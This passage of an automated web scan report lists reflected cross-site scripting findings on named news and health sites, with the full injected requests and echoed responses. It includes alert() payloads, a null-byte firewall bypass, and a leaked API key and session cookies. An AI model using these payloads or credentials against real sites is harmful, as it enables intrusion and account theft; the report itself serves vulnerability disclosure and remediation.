Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Content-Language: en
Content-Length: 68717
Keep-Alive: timeout=5, max=999
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Market Movers:</titl
...[SNIP]...
<!--
var relegenceTopics='MOSTACTIVESB7010';71E04F33930';
var RTN_SNIPPET_SIZE = '300';
var RTN_HOVER_TIMEOUT = '16000';
// -->
...[SNIP]...

5.176. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc36d'%3bf5e1aa920da was submitted in the REST URL parameter 2. This input was echoed as fc36d';f5e1aa920da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /allergy/climate-change-and-allergies.aspxfc36d'%3bf5e1aa920da HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBurMtkMjIxMTI2NS01ODVmLTQwMjYtOTNhZi1lZDQyOGE5ZWU2Y2E1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dbvjd455jngipsngirkccraw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16443


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/allergy/climate-change-and-allergies.aspxfc36d';f5e1aa920da', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

5.177. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c6e76"><script>alert(1)</script>76c82397b8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6e76"><script>alert(1)</script>76c82397b8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO*ri-NiNTMxMWZkZS04NTY4LTRiYjEtODAwOC0xN2Q0NzQ1YTM0NGQ1; expires=Wed, 13-Jul-2011 21:36:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=c5cfbq55mbxvfz55feiauhef; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49343


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1" />
...[SNIP]...

5.178. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac7e'%3b98481e38035 was submitted in the REST URL parameter 3. This input was echoed as 8ac7e';98481e38035 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e'%3b98481e38035 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPFHohNiNzhlZWI5Mi02YzQyLTQyMWMtOWExZS1iZWJlZjRmYjg5ZTU1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hxo2de55iuwcrdvelxqosn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e';98481e38035', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

5.179. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004b806"><script>alert(1)</script>8759e8fbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4b806"><script>alert(1)</script>8759e8fbd80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPB*XTNmOWRkZmU1ZS0xODQ2LTQ1ZTAtYWNlYS0xY2FjNmI1YzNlZDI1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=k0j5vvz5mxglzzntqc5yh03h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49861


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1" />
...[SNIP]...

5.180. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9361'%3b84c782d8b16 was submitted in the REST URL parameter 3. This input was echoed as a9361';84c782d8b16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361'%3b84c782d8b16 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPEoo5s1MDkxMWEzZi0yMDZiLTRjYTAtYWNmNS0wZTY1YTU3ODg5ZjQ1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xn1xydrmhljdevihanbstg45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361';84c782d8b16', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

5.181. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a9efd"><script>alert(1)</script>8b47a959d8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9efd"><script>alert(1)</script>8b47a959d8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBnhcM4ODI1YTExNS0xOGU4LTQwMDktOTliYi0wZGFlYzYyZDY0MGU1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zln3ns55gb5bpcmolex34fm4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49142


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1" />
...[SNIP]...

5.182. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f526d'%3bb39bf44577d was submitted in the REST URL parameter 3. This input was echoed as f526d';b39bf44577d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d'%3bb39bf44577d HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPID-ztmODA3YjBjZC03ZWNhLTRlNTQtODI4OS1lYTk2OWZjNDIxNzI1; expires=Wed, 13-Jul-2011 21:36:37 GMT; path=/
Set-Cookie: ASP.NET_SessionId=w3vie3btzynw5f451gmktxfe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16651


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d';b39bf44577d', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

5.183. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d45e7"><script>alert(1)</script>ec06d481550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d45e7"><script>alert(1)</script>ec06d481550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPE-GLMyMDBhOGIyYi0wNTRiLTQ3ZmYtYTVhZC00MDg4M2QxNGVlMTM1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jud0jt45dvf1vafmolehev55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47550


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1" />
...[SNIP]...

5.184. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 77493(a)5729f6350b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?77493(a)5729f6350b6=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:38 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?77493(a)5729f6350b6\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

5.185. http://www.huffingtonpost.com/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8739e"-alert(1)-"26ca8215966 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 00:58:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display_d
...[SNIP]...

5.186. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a79a"-alert(1)-"0ae47100ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=30
Date: Thu, 05 May 2011 00:58:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

5.187. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76498"-alert(1)-"978acabc995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/02/?76498"-alert(1)-"978acabc995=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 123154
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=277
Date: Thu, 05 May 2011 10:58:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/?76498"-alert(1)-"978acabc995=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

5.188. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/02/holocaust-memorial-day_n_856638.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a5e"-alert(1)-"d6ccc38ed4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

